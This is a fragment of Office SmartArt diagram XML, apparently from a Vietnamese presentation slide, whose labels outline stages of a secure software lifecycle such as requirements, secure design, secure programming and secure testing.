        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{032C08A4-BE1B-4162-BA48-5B1D5D8815BF}" type="sibTrans" cxnId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E073F9E-A952-410B-B079-D921482E3FA4}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00FF00"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</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41BCF2B2-01A0-484D-A227-D07C0152D452}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="desTx" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}" type="pres">
      <dgm:prSet presAssocID="{379338AE-DC9F-4A52-B28E-1291486E4517}" presName="labelTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1C7B2439-98A6-4A2B-BDB8-438079493C67}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{759FDF1A-46CB-4DD6-A232-39900ACE14DF}" srcOrd="1" destOrd="0" parTransId="{EBD1FDD3-F3E1-4EF5-AB02-3A05A129FFE4}" sibTransId="{840B7BEC-A424-4364-B52E-A493DF1255BE}"/>
    <dgm:cxn modelId="{7F37D5C8-E16A-4389-ABBC-ABB93E9EB1A4}" srcId="{6C03E07F-ECFB-4D2F-BA96-D23DA7C5AC73}" destId="{9EA58EC5-7D69-4397-8093-5A4FCBD369E8}" srcOrd="0" destOrd="0" parTransId="{D56EEE90-AC73-4E4D-8BBC-6E0E7885DFB1}" sibTransId="{D5E5875A-C60C-4FC3-869B-722E371FA6E0}"/>
    <dgm:cxn modelId="{B97F3FAE-3AF0-4808-8C8A-4E9A2B41D65D}" type="presOf" srcId="{379338AE-DC9F-4A52-B28E-1291486E4517}" destId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{1E4F1B7C-FB3D-48C4-96E1-55469EE72B83}" type="presOf" srcId="{1E073F9E-A952-410B-B079-D921482E3FA4}" destId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}"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740F8903-5739-4710-9802-9B1B3A04DE18}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{6C03E07F-ECFB-4D2F-BA96-D23DA7C5AC73}" srcOrd="0" destOrd="0" parTransId="{D1FC4842-2686-45D4-A56A-3F897EF3B16F}" sibTransId="{E35E76B6-7078-4B09-B349-C02F66AA5978}"/>
    <dgm:cxn modelId="{7DE84081-C82B-4DBF-BD2A-34FB9CB31DB4}" srcId="{379338AE-DC9F-4A52-B28E-1291486E4517}" destId="{1E073F9E-A952-410B-B079-D921482E3FA4}" srcOrd="0" destOrd="0" parTransId="{D650692B-9DFA-4C62-905B-EED2C95C7358}" sibTransId="{05857875-BC1E-454A-B60B-68199207A48E}"/>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CED0B9D0-E2DC-4CB1-A2C1-36298657AC7B}" type="presOf" srcId="{6C03E07F-ECFB-4D2F-BA96-D23DA7C5AC73}" destId="{7D701CF5-2CC3-48B9-A656-E2968A10AA3B}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{89F6AEB2-4790-487C-AC1B-D20A20054F51}" type="presOf" srcId="{9EA58EC5-7D69-4397-8093-5A4FCBD369E8}" destId="{A08A9154-0BEB-4230-91C9-16FAC1EF6E1C}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{6E39188D-614A-4B96-B935-DE4D7F7BBFDE}" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{379338AE-DC9F-4A52-B28E-1291486E4517}" srcOrd="2" destOrd="0" parTransId="{0C779D05-F57F-49F4-AB58-6E152072210E}" sibTransId="{032C08A4-BE1B-4162-BA48-5B1D5D8815BF}"/>
    <dgm:cxn modelId="{314C4E73-477B-4DFC-A12A-BEB22C372D5A}" type="presOf" srcId="{8C66E9B3-B12D-4C23-A273-982D7F969BBC}" destId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}"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41E6AD03-1749-48C1-BC02-36928CABE1F9}" type="presParOf" srcId="{BDFB8683-95A4-4BBF-9344-3A0D69314DBB}" destId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" srcOrd="4" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{759F8297-5756-47A3-89A7-AC9CA0734200}" type="presParOf" srcId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" destId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/NumberedList"/>
    <dgm:cxn modelId="{603F48AB-312C-4DC5-A933-B8160868015E}" type="presParOf" srcId="{41BCF2B2-01A0-484D-A227-D07C0152D452}" destId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}"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4B457D02-B5C8-429E-9D8E-CE7BFD9BA9CF}"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E691471-FB38-4211-AB56-CA70AA026FFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Yêu cầu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96EC319A-77B3-4130-8C1F-EF6D3CBCA973}" type="parTrans" cxnId="{445A7BF9-5AA6-499B-9985-445D0828D077}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EA87C85-0E04-4687-BCD5-CC51AEFABAFC}" type="sibTrans" cxnId="{445A7BF9-5AA6-499B-9985-445D0828D077}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D595F49-8CA3-45D1-9EED-BEE6EB0DCC68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>Thiết kế an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04968895-133D-4CDF-A0A6-D7501A77AEF6}" type="parTrans" cxnId="{FFDC3AA8-5F7E-4D4A-8C09-86D87E40CCA6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DF0042C-5CE7-46AD-A9D9-F3654A9FB634}" type="sibTrans" cxnId="{FFDC3AA8-5F7E-4D4A-8C09-86D87E40CCA6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A829591-EF65-4A3E-A1C9-3AB0D9B069FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>Lập trình an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E66BE9A-7A9B-4986-AAF8-F2297D59C8F2}" type="parTrans" cxnId="{3D717E33-1E7D-49C0-A855-EEE6E37B0F1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA204652-1F6A-49F2-B2CB-15C75859D3D9}" type="sibTrans" cxnId="{3D717E33-1E7D-49C0-A855-EEE6E37B0F1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{836FF8CB-531E-400D-80C6-8C0B322F2923}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>Kiểm thử an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6CD448B-C9E1-445F-B788-FE6271282347}" type="parTrans" cxnId="{04023D8E-F2AB-4E8D-86E3-E31D054FA584}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80E581D0-6CD3-43D2-89CA-10682F6B74B1}" type="sibTrans" cxnId="{04023D8E-F2AB-4E8D-86E3-E31D054FA584}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58667242-F69F-420A-9414-129EBAAD9ED5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Khai thác an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDD3AC38-CD79-44D4-9A74-A09F10724CA2}" type="parTrans" cxnId="{CD7A32C2-3B8E-4021-90B2-6A1F4C9F70F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4CA0D050-634D-4E59-8F99-CF4EE8782590}" type="sibTrans" cxnId="{CD7A32C2-3B8E-4021-90B2-6A1F4C9F70F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Thực hiện</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63FAC323-62B9-467A-BF0B-7CC377E03D8B}" type="parTrans" cxnId="{9F73E7DF-A328-45AD-82BC-609079F80C43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6375FF7-BB76-4B9A-B3EE-43102E1E85F7}" type="sibTrans" cxnId="{9F73E7DF-A328-45AD-82BC-609079F80C43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D74142AE-DE70-491B-B667-60B8ACB25D6B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Phát triển, Sử dụng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF3966DD-5C57-4460-8D7D-892B26BB2964}" type="parTrans" cxnId="{262BEE08-EAC5-4165-B183-61125C1EA903}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53BBA451-3970-46F2-A120-02267F4D9977}" type="sibTrans" cxnId="{262BEE08-EAC5-4165-B183-61125C1EA903}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCBABCCF-A9AC-4065-81F5-8929FB7620AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Phát triển</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51C550F3-DDD3-46B6-8F3C-224CF31D8941}" type="parTrans" cxnId="{F91B6D70-36C0-4E97-8B06-C2077D71A89D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87062F02-2784-4C38-A126-D920D32811E8}" type="sibTrans" cxnId="{F91B6D70-36C0-4E97-8B06-C2077D71A89D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30E0FCF5-7893-403D-8673-201E8DE35596}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>Phát triển, Sử dụng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2439CF00-DC99-4D3B-8901-336DC800EC44}" type="parTrans" cxnId="{2110AE6F-BF3F-4950-93B5-DAFC424B58B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E094E33-59B1-4B99-9917-599735FC47C2}" type="sibTrans" cxnId="{2110AE6F-BF3F-4950-93B5-DAFC424B58B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFA342DB-3279-4863-BDB6-A2EAAE4B5A91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Phát triển, Sử dụng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6C07EC4-6DA9-4662-A085-8A06C5D94C76}" type="parTrans" cxnId="{EFAE6FBE-D8B6-415D-9E3C-4EAD28E06ADE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDFCB7A0-2B60-4DAD-A2A9-0D0614787F7D}" type="sibTrans" cxnId="{EFAE6FBE-D8B6-415D-9E3C-4EAD28E06ADE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76C995A1-BDFB-48AF-81CE-E04E4AA2A263}" type="pres">
      <dgm:prSet presAssocID="{4B457D02-B5C8-429E-9D8E-CE7BFD9BA9CF}" presName="theList" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{031579B8-B740-46AF-A6D4-53CEA7AFCDFD}" type="pres">
      <dgm:prSet presAssocID="{7E691471-FB38-4211-AB56-CA70AA026FFD}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E64B11B-1FB0-4E4D-887E-82C7C79B24F8}" type="pres">
      <dgm:prSet presAssocID="{7E691471-FB38-4211-AB56-CA70AA026FFD}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFB79348-0F78-4F07-A887-AD89AFFA0DD8}" type="pres">
      <dgm:prSet presAssocID="{7E691471-FB38-4211-AB56-CA70AA026FFD}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAB8CC09-C1B4-4444-8772-05FF95A1A1D9}" type="pres">
      <dgm:prSet presAssocID="{7E691471-FB38-4211-AB56-CA70AA026FFD}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71F59326-3571-4133-8570-71855B67B7DC}" type="pres">
      <dgm:prSet presAssocID="{7E691471-FB38-4211-AB56-CA70AA026FFD}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92D5E9C4-B9AA-41FD-AE34-B04F22BD7F33}" type="pres">
      <dgm:prSet presAssocID="{0D595F49-8CA3-45D1-9EED-BEE6EB0DCC68}" presName="childNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF9AE7E4-01C8-45F4-8063-D4BE8CEB7111}" type="pres">
      <dgm:prSet presAssocID="{0D595F49-8CA3-45D1-9EED-BEE6EB0DCC68}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{554ABEAD-EFB0-4ABB-A0A8-16576E38E62F}" type="pres">
      <dgm:prSet presAssocID="{7A829591-EF65-4A3E-A1C9-3AB0D9B069FE}" presName="childNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22B0D8C3-1105-4410-81C1-351373A259D6}" type="pres">
      <dgm:prSet presAssocID="{7A829591-EF65-4A3E-A1C9-3AB0D9B069FE}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE88701F-0306-4D7B-9956-52814B9A671C}" type="pres">
      <dgm:prSet presAssocID="{836FF8CB-531E-400D-80C6-8C0B322F2923}" presName="childNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CD998A8-DB8A-412D-B1C4-E06E6E3B778C}" type="pres">
      <dgm:prSet presAssocID="{836FF8CB-531E-400D-80C6-8C0B322F2923}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99B486E3-5B08-4FD5-AC99-1F112361DE81}" type="pres">
      <dgm:prSet presAssocID="{58667242-F69F-420A-9414-129EBAAD9ED5}" presName="childNode" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9252B015-C369-463F-8B79-870B1BE09429}" type="pres">
      <dgm:prSet presAssocID="{7E691471-FB38-4211-AB56-CA70AA026FFD}" presName="aSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA8D73A1-52AC-40E3-8091-4690C16FCC83}" type="pres">
      <dgm:prSet presAssocID="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{729E3707-EDD4-45AF-9872-109CB750C567}" type="pres">
      <dgm:prSet presAssocID="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{765ED544-51F1-4EE1-AD44-7D6689BCAE1A}" type="pres">
      <dgm:prSet presAssocID="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3B4CBB4-89C2-4895-81DB-E33BC5A0B963}" type="pres">
      <dgm:prSet presAssocID="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" type="pres">
      <dgm:prSet presAssocID="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD699742-0367-4478-BC0E-18E4FA0D60E3}" type="pres">
      <dgm:prSet presAssocID="{D74142AE-DE70-491B-B667-60B8ACB25D6B}" presName="childNode" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69A6E080-680C-4FB6-9BDF-60CA15BD119A}" type="pres">
      <dgm:prSet presAssocID="{D74142AE-DE70-491B-B667-60B8ACB25D6B}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB4D1FAB-0098-4A8E-9648-4B5FC3DE18AC}" type="pres">
      <dgm:prSet presAssocID="{CCBABCCF-A9AC-4065-81F5-8929FB7620AB}" presName="childNode" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4D6E49-B4BF-4082-A40B-DBB4BE24843D}" type="pres">
      <dgm:prSet presAssocID="{CCBABCCF-A9AC-4065-81F5-8929FB7620AB}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{54D07CCB-3F1C-4E99-9A19-DB06B7BE73ED}" type="pres">
      <dgm:prSet presAssocID="{30E0FCF5-7893-403D-8673-201E8DE35596}" presName="childNode" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E59AC3F-8CA5-4404-AF86-237AF99706E2}" type="pres">
      <dgm:prSet presAssocID="{30E0FCF5-7893-403D-8673-201E8DE35596}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2799E6B7-5AA2-4E44-9BBA-C5BF0C1DABF2}" type="pres">
      <dgm:prSet presAssocID="{DFA342DB-3279-4863-BDB6-A2EAAE4B5A91}" presName="childNode" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
